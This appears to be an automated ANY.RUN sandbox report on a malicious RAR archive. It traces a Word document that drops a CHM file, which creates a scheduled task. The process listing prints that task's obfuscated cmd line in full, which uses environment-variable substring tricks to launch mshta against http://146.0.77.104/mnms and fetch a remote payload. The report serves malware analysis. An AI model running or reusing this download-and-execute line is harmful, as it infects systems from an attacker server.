analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Desktop.rar

Full analysis: https://app.any.run/tasks/f727491a-9daf-4257-9dde-ce9380c2a17d
Verdict: Malicious activity
Analysis date: January 17, 2019, 17:52:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

2EC6AF0E63968EEA13347E8C4144462C

SHA1:

E9F7AE588189588630FBD2ED0E9AF613377D9871

SHA256:

06122B0FE36AB6046C6CF925AA720F8D927613300224AE8748420F9FCCE5F8E9

SSDEEP:

96:ZS6IMNRldaU+N55iRx4kXo3w/QVyPVX2LrA7d2S6Lb0HwfG+jS:MMrat5iRPYA/oSXGrAZsY8G+W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3356)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3636)
      • schtasks.exe (PID: 3304)

    • Uses Task Scheduler to run other applications

      • hh.exe (PID: 612)
      • cmd.exe (PID: 2628)

  • SUSPICIOUS

    • Reads internet explorer settings

      • hh.exe (PID: 612)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 2628)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3356)
      • WINWORD.EXE (PID: 3972)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3972)
      • WINWORD.EXE (PID: 3356)

    • Reads internet explorer settings

      • mshta.exe (PID: 2420)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs winword.exe no specs hh.exe no specs schtasks.exe no specs cmd.exe no specs mshta.exe schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2956"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Desktop.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
3972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuevo Documento de Microsoft Word (2).docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3356"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuevo Documento de Microsoft Word (2).docx"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
612"C:\Windows\hh.exe" C:\Users\admin\AppData\Local\Temp\1.CHMC:\Windows\hh.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® HTML Help Executable
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3636"C:\Windows\System32\schtasks.exe" /create /tn 4 /tr " C:\Windows\System32\cmd.exe /c st%ALLUSERSPROFILE:~8,1%rt C:\Windows\System32\msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.77.104/%ALLUSERSPROFILE:~9,1%n%ALLUSERSPROFILE:~9,1%s && schtasks.exe /delete /tn 4 /f" /sc minute /FC:\Windows\System32\schtasks.exehh.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2628C:\Windows\System32\cmd.exe /c st%ALLUSERSPROFILE:~8,1%rt C:\Windows\System32\msht%ALLUSERSPROFILE:~8,1% H%ALLUSERSPROFILE:~12,1%%ALLUSERSPROFILE:~12,1%p://146.0.77.104/%ALLUSERSPROFILE:~9,1%n%ALLUSERSPROFILE:~9,1%s && schtasks.exe /delete /tn 4 /fC:\Windows\System32\cmd.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2420C:\Windows\System32\mshta Http://146.0.77.104/mnms C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3304schtasks.exe /delete /tn 4 /fC:\Windows\system32\schtasks.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 378
Read events
2 534
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
17
Unknown types
17

Dropped files

PID
Process
Filename
Type
3972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRAECE.tmp.cvr
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\1.CHM
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\Desktop\~WRD0000.tmp
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{09E2507A-DF3C-4753-B3C7-3FEC18D214F0}.tmp
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{9E3BB698-4173-41FB-AA41-3B6E1B081B10}.tmp
MD5:
SHA256:
3356WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRB08F.tmp.cvr
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\IMTCD3.tmp
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\~DFF7E6534E0CC4BC68.TMP
MD5:
SHA256:
612hh.exeC:\Users\admin\AppData\Local\Temp\~DFCA0A2ABDB8EC85B5.TMP
MD5:
SHA256:
3972WINWORD.EXEC:\Users\admin\Desktop\Nuevo Documento de Microsoft Word (2).docxdocument
MD5:B4AC907D5ABF5350D920D62B2603FD4B
SHA256:C1DD33781F5B092F9762E2392EBBC315052B8FC421D3C363A584B3DCBAF79A6F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2420
mshta.exe
GET
146.0.77.104:80
http://146.0.77.104/mnms
NL
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2420
mshta.exe
146.0.77.104:80
Hostkey B.v.
NL
malicious

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Desktop.rar